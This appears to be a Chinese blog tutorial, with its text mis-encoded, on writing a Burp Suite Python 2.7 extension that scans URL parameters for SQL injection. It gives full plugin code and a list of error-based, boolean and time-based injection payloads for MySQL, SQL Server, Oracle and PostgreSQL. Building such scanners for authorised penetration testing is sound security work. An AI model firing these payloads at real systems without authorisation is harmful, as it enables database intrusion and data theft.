每次測(cè)注入都是用burp的Intruder模塊,很不方便就是批量跑批量測(cè)哪些沒(méi)有過(guò)濾
懶人鵝上線(xiàn),準(zhǔn)備搞一個(gè)sql測(cè)試的插件
本篇文章代碼量大,基礎(chǔ)可以去看上一篇
一、 需求分析
測(cè)試sql基本注入的載荷,在可能有sql注入的地方發(fā)送測(cè)試包,目前只測(cè)試url中的,并可以根據(jù)錯(cuò)誤回顯判斷出數(shù)據(jù)庫(kù)類(lèi)型,需要有用戶(hù)界面,可以加載到Burp的Extensions模塊
二、編寫(xiě)代碼
上面這個(gè)burp包需要下載
????????pip install? burp
我加注釋的地方是中文的最好復(fù)制后導(dǎo)入burp前刪掉,不然可能會(huì)導(dǎo)入報(bào)錯(cuò)
里面打印出來(lái)的結(jié)果也用的是英文,感覺(jué)burp兼容中文性不高
需要注意改動(dòng)代碼按照python2.7版本去,如果比這個(gè)版本高的方式寫(xiě)可能導(dǎo)入會(huì)報(bào)錯(cuò)
如:
#下面這種方式就用不了因?yàn)椴恢С?print(f"Testing payload: {payload}")
#這個(gè)就可以
print("Testing payload: {}".format(payload))
from burp import IBurpExtender, IContextMenuFactory, ITab, IScannerCheck, IScanIssue, IHttpService, IHttpRequestResponse, IExtensionStateListener, IParameter, IProxyListener, IScannerInsertionPointProvider, IScannerInsertionPoint, IBurpExtenderCallbacks
from javax.swing import JTabbedPane, JPanel, JButton, JTextArea, JScrollPane, SwingConstants, GroupLayout, JTextField, JMenuItem, SwingUtilities
from java.awt import BorderLayout, Color
from java.util import ArrayList
from java.awt.event import ActionListener
from java.net import URL
import sys
import threading
class ScanIssue(IScanIssue):
def __init__(self, helpers, http_service, url, request_response, name, detail, severity, confidence):
self._helpers = helpers
self._http_service = http_service
self._url = url
self._request_response = request_response
self._name = name
self._detail = detail
self._severity = severity
self._confidence = confidence
def getUrl(self):
return self._url
def getIssueName(self):
return self._name
def getIssueType(self):
return 0
def getSeverity(self):
return self._severity
def getConfidence(self):
return self._confidence
def getIssueBackground(self):
return None
def getRemediationBackground(self):
return None
def getIssueDetail(self):
return self._detail
def getRemediationDetail(self):
return None
def getHttpMessages(self):
return self._request_response
def getHttpService(self):
return self._http_service
class BurpExtender(IBurpExtender, ITab, IScannerCheck, IContextMenuFactory, ActionListener, IScannerInsertionPointProvider):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self._scan_lock = threading.Lock()
self._tabbedPane = JTabbedPane()
self.initUI()
callbacks.registerScannerInsertionPointProvider(self)
#模塊名稱(chēng)
callbacks.setExtensionName("SQL Injection Scanner")
callbacks.registerContextMenuFactory(self)
callbacks.customizeUiComponent(self._tabbedPane)
callbacks.registerScannerCheck(self)
callbacks.addSuiteTab(self)
def initUI(self):
self._mainPanel = JPanel(BorderLayout())
self._urlInput = JTextField(50)
self._scanButton = JButton("Start Scan", actionPerformed=self.start_scan)
self._scanOutput = JTextArea()
self._scanOutput.setEditable(False)
scrollPane = JScrollPane(self._scanOutput)
layout = GroupLayout(self._mainPanel)
self._mainPanel.setLayout(layout)
layout.setAutoCreateGaps(True)
layout.setAutoCreateContainerGaps(True)
layout.setHorizontalGroup(
layout.createParallelGroup(GroupLayout.Alignment.CENTER)
.addGroup(layout.createSequentialGroup()
.addComponent(self._urlInput)
.addComponent(self._scanButton))
.addComponent(scrollPane)
)
layout.setVerticalGroup(
layout.createSequentialGroup()
.addGroup(layout.createParallelGroup(GroupLayout.Alignment.BASELINE)
.addComponent(self._urlInput)
.addComponent(self._scanButton))
.addComponent(scrollPane)
)
self._tabbedPane.addTab("SQL Injection Scanner", self._mainPanel)
def getTabCaption(self):
return "SQL Injection Scanner"
def getUiComponent(self):
return self._tabbedPane
def createInsertionPoints(self, baseRequestResponse):
request_info = self._helpers.analyzeRequest(baseRequestResponse)
parameters = request_info.getParameters()
insertion_points = []
for param in parameters:
if param.getType() != IParameter.PARAM_URL:
continue
# 創(chuàng)建自定義插入點(diǎn)
insertion_point = CustomInsertionPoint(self._helpers, baseRequestResponse.getRequest(), param)
insertion_points.append(insertion_point)
return insertion_points
def start_scan(self, event):
print("Start Scan button clicked.")
thread = threading.Thread(target=self.scan_logic)
thread.start()
def scan_logic(self):
try:
print("scan_logic started")
target_url = self._urlInput.getText()
try:
url = URL(target_url)
except Exception as e:
print("Error: Invalid URL")
SwingUtilities.invokeLater(lambda: self._scanOutput.append("Error: Invalid URL\n"))
return
baseRequestResponse = self._callbacks.makeHttpRequest(
self._helpers.buildHttpService(url.getHost(), url.getPort(), url.getProtocol() == "https"),
self._helpers.stringToBytes("GET {} HTTP/1.1\r\nHost: {}\r\n\r\n".format(url.getPath(), url.getHost()))
)
# Manually parse the URL to get the query string
query_string = url.getQuery()
if not query_string:
print("No query string found.")
return
# Split the query string into parameters
query_params = query_string.split("&")
# Create a list to store the parameters
params = []
# 遍歷查詢(xún)參數(shù)
for query_param in query_params:
# Split the parameter into name and value
name, value = query_param.split("=", 1)
# Create a new URL parameter and add it to the list
param = self._helpers.buildParameter(name, value, IParameter.PARAM_URL)
params.append(param)
print("Number of parameters found:", len(params))
# 檢查參數(shù)是否存在
if not params:
print("No parameters found.")
return
# 創(chuàng)建列表插入點(diǎn)
insertion_points = []
# 遍歷參數(shù)
for param in params:
print("Creating insertion point for parameter:", param.getName())
# Create an instance of your custom insertion point class
insertion_point = CustomInsertionPoint(self._helpers, baseRequestResponse.getRequest(), param)
insertion_points.append(insertion_point)
# 打印插入點(diǎn)數(shù)量
print("Number of insertion points created:", len(insertion_points))
issues = self.doActiveScan(baseRequestResponse, [])
if issues:
for issue in issues:
print("Found issue: {} - {}".format(issue.getUrl(), issue.getIssueName()))
SwingUtilities.invokeLater(lambda: self._scanOutput.append("{} - {}\n".format(issue.getUrl(), issue.getIssueName())))
else:
print("No issues found.")
SwingUtilities.invokeLater(lambda: self._scanOutput.append("{} - Scan result\n".format(target_url)))
print("scan_logic method finished.")
SwingUtilities.invokeLater(lambda: self._callbacks.issueAlert("Start scan clicked"))
# 定義sql注入payload
payloads = [
"'",
'"',
" OR 1=1",
"' OR '1'='1",
" AND SLEEP(3)",
"'; WAITFOR DELAY '0:0:3';",
" AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66)||CHR(67),3)",
"' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE rownum=1))--",
"' AND 1=CAST(0x5F21403264696C656D6D61 AS varchar(8000))--",
"' AND extractvalue(1,concat(0x5c, (SELECT @@version)))",
"' AND 1=pg_sleep(3)--",
"' AND 1=(SELECT banner FROM v$version WHERE rownum=1)--",
" AND 1=(SELECT @@version)--"
]
# 遍歷插入payload
for insertion_point in insertion_points:
print("Testing insertion point: {}".format(insertion_point.getInsertionPointName()))
self._original_response = baseRequestResponse.getResponse()
self._original_response_body = self._helpers.bytesToString(self._original_response)
for payload in payloads:
# print("Testing insertion point: ",insertion_point.getInsertionPointName())
# print("Testing payload: ",payload)
# # Insert the payload into the request
# modified_request = insertion_point.buildRequest(payload)
# # Send the modified request
# checkRequestResponse = self._callbacks.makeHttpRequest(
# baseRequestResponse.getHttpService(), modified_request)
# # Check if the response indicates a potential SQL injection
# if self.check_for_sql_injection(checkRequestResponse.getResponse()):
# print("Potential SQL injection found with payload: ",payload)
# # Add the issue to the SQL Injection Scanner module
# SwingUtilities.invokeLater(lambda: self._scanOutput.append(
# "{} - Potential SQL injection with payload: {}\n".format(target_url, payload)
# ))
# else:
# print("No issues found with payload: ",payload)
# SwingUtilities.invokeLater(lambda: self._scanOutput.append(
# "{} - No issues found with payload: {}\n".format(target_url, payload)
# ))
print("Testing payload: {}".format(payload))
attack_request = insertion_point.buildRequest(payload)
attack_response = self._callbacks.makeHttpRequest(
baseRequestResponse.getHttpService(),
attack_request
)
if self.check_sql_injection(attack_response, payload):
print("Potential SQL injection found with payload:",payload)
SwingUtilities.invokeLater(lambda: self._scanOutput.append(
"{} - Potential SQL injection with payload: {}\n".format(target_url, payload)
))
else:
print("No issues found with payload:", payload)
SwingUtilities.invokeLater(lambda: self._scanOutput.append(
"{} - No issues found with payload: {}\n".format(target_url, payload)
))
print("scan_logic method finished.")
except Exception as e:
print("scan_logic error: ", e)
def check_for_sql_injection(self, response):
sql_errors = [
"You have an error in your SQL syntax",
"Warning: mysql_",
"Warning: mysqli_",
"Fatal error: Uncaught PDOException",
"syntax error or access violation"
]
response_str = self._helpers.bytesToString(response)
for sql_error in sql_errors:
if sql_error in response_str:
return True
return False
#這個(gè)方法里面的內(nèi)容其實(shí)我合并到上面scann方法里面了
def doActiveScan(self, baseRequestResponse, insertionPoint):
print("Number of insertion points created: {}".format(len(insertionPoint)))
issues = []
if not insertionPoint:
insertion_points = self.createInsertionPoints(baseRequestResponse)
else:
insertion_points = [insertionPoint]
# for insertion_point in insertion_points:
# print("Testing insertion point: {}".format(insertion_point.getInsertionPointName()))
# self._original_response = baseRequestResponse.getResponse()
# self._original_response_body = self._helpers.bytesToString(self._original_response)
# payloads = [
# "'",
# '"',
# " OR 1=1",
# "' OR '1'='1",
# " AND SLEEP(3)",
# "'; WAITFOR DELAY '0:0:3';",
# " AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66)||CHR(67),3)",
# "' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE rownum=1))--",
# "' AND 1=CAST(0x5F21403264696C656D6D61 AS varchar(8000))--",
# "' AND extractvalue(1,concat(0x5c, (SELECT @@version)))",
# "' AND 1=pg_sleep(3)--",
# "' AND 1=(SELECT banner FROM v$version WHERE rownum=1)--",
# " AND 1=(SELECT @@version)--"
# ]
# for payload in payloads:
# print("Testing payload: {}".format(payload))
# attack_request = insertion_point.buildRequest(payload)
# attack_response = self._callbacks.makeHttpRequest(
# baseRequestResponse.getHttpService(),
# attack_request
# )
# if self.check_sql_injection(attack_response, payload):
# issues.append(self.create_scan_issue(baseRequestResponse, attack_request, attack_response))
# else:
# print("No issues found with payload: {}".format(payload))
return issues
def check_sql_injection(self, response, payload):
response_body = self._helpers.bytesToString(response.getResponse())
sql_errors = [
"SQL syntax",
"MySQL error",
"SQL error",
"syntax error",
"ORA-01756",
"Microsoft OLE DB Provider for ODBC Drivers error",
"Unclosed quotation mark",
"Error Executing Database Query"
]
for error in sql_errors:
if error in response_body:
return True
if " OR 1=1" in payload or "' OR '1'='1" in payload:
if response_body != self._original_response_body:
return True
time_based_payloads = [" AND SLEEP(", "'; WAITFOR DELAY '", " AND 1=DBMS_PIPE.RECEIVE_MESSAGE(", "' AND 1=pg_sleep("]
if any(p in payload for p in time_based_payloads):
time_difference = self._helpers.analyzeResponse(response.getResponse()).getTime() - self._helpers.analyzeResponse(self._original_response).getTime()
if time_difference >= 3000:
return True
return False
def create_scan_issue(self, baseRequestResponse, attack_request, attack_response):
return ScanIssue(
self._helpers,
baseRequestResponse.getHttpService(),
self._helpers.analyzeRequest(baseRequestResponse).getUrl(),
[self._callbacks.applyMarkers(baseRequestResponse, None, None), self._callbacks.applyMarkers(attack_response, None, None)],
"SQL Injection",
"High",
"Certain"
)
def send_to_scanner(self, event):
messages = self._current_invocation.getSelectedMessages()
if messages:
url = messages[0].getUrl()
self._urlInput.setText(url.toString())
ui_component = self.getUiComponent()
ui_component.setForeground(Color.red)
self._callbacks.customizeUiComponent(ui_component)
# self._callbacks.customizeUiComponent(self.getUiComponent().setForeground(Color.red))
def createMenuItems(self, invocation):
self._current_invocation = invocation
menu_items = ArrayList()
menu_item = JMenuItem("Send to SQL Injection Scanner", actionPerformed=self.send_to_scanner)
menu_items.add(menu_item)
return menu_items
def menuItemClicked(self, event):
current_request = self._callbacks.getSelectedMessages()[0]
base_request_response = current_request.getRequestResponse()
issues = self.doActiveScan(base_request_response, None)
for issue in issues:
print("{} - {}".format(issue.getUrl(), issue.getIssueName()))
def doPassiveScan(self, baseRequestResponse):
return []
class CustomInsertionPoint(IScannerInsertionPoint):
def __init__(self, helpers, request, parameter=None, is_path_insertion_point=False):
self._helpers = helpers
self._request = request
self._parameter = parameter
self._is_path_insertion_point = is_path_insertion_point
def getInsertionPointName(self):
if self._is_path_insertion_point:
return "Custom Path Insertion Point"
return "Custom Insertion Point: {}".format(self._parameter.getName())
def getBaseValue(self):
if self._is_path_insertion_point:
return self._helpers.analyzeRequest(self._request).getUrl().getPath()
return self._parameter.getValue()
def buildRequest(self, payload):
if self._is_path_insertion_point:
url = self._helpers.analyzeRequest(self._request).getUrl()
new_path = url.getPath() + payload
new_url = URL(url.getProtocol(), url.getHost(), url.getPort(), new_path)
return self._helpers.buildHttpRequest(new_url)
return self._helpers.updateParameter(self._request, self._helpers.buildParameter(self._parameter.getName(), payload, self._parameter.getType()))
def getPayloadOffsets(self, payload):
return None
def getInsertionPointType(self):
return IScannerInsertionPoint.INS_PARAM_URL
三、數(shù)據(jù)庫(kù)類(lèi)型檢測(cè)
????????增加針對(duì)不同數(shù)據(jù)庫(kù)類(lèi)型的攻擊載荷,并添加檢測(cè)時(shí)間盲注和布爾盲注的方法。這將使得擴(kuò)展更加強(qiáng)大,能夠檢測(cè)到更多類(lèi)型的SQL注入攻擊。
payloads = [
"'", # 錯(cuò)誤提示
'"', # 錯(cuò)誤提示
" OR 1=1", # 布爾盲注
"' OR '1'='1", # 布爾盲注
" AND SLEEP(3)", # MySQL時(shí)間盲注
"'; WAITFOR DELAY '0:0:3';", # SQL Server時(shí)間盲注
" AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66)||CHR(67),3)", # Oracle時(shí)間盲注
"' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE rownum=1))--", # Oracle基于錯(cuò)誤的注入
"' AND 1=CAST(0x5F21403264696C656D6D61 AS varchar(8000))--", # SQL Server基于錯(cuò)誤的注入
"' AND extractvalue(1,concat(0x5c, (SELECT @@version)))", # MySQL基于錯(cuò)誤的注入
"' AND 1=pg_sleep(3)--", # PostgreSQL時(shí)間盲注
"' AND 1=(SELECT banner FROM v$version WHERE rownum=1)--", # Oracle布爾盲注
" AND 1=(SELECT @@version)--" # MySQL布爾盲注
]
四、測(cè)試
名字啥的都可以在代碼里面更改
還有就是這是最基礎(chǔ)的檢測(cè),還不如sqlmap,有興趣的師傅可以和我一起完善一下
?
?本篇文章只用作技術(shù)交流,利用文章內(nèi)的技術(shù)進(jìn)行違法活動(dòng),均與本博主無(wú)關(guān)!文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-701673.html
尋找志同道合的師傅一起完善哈文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-701673.html
到了這里,關(guān)于使用Burp Suite和Python進(jìn)行自動(dòng)化漏洞挖掘—SQL測(cè)試注入插件的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!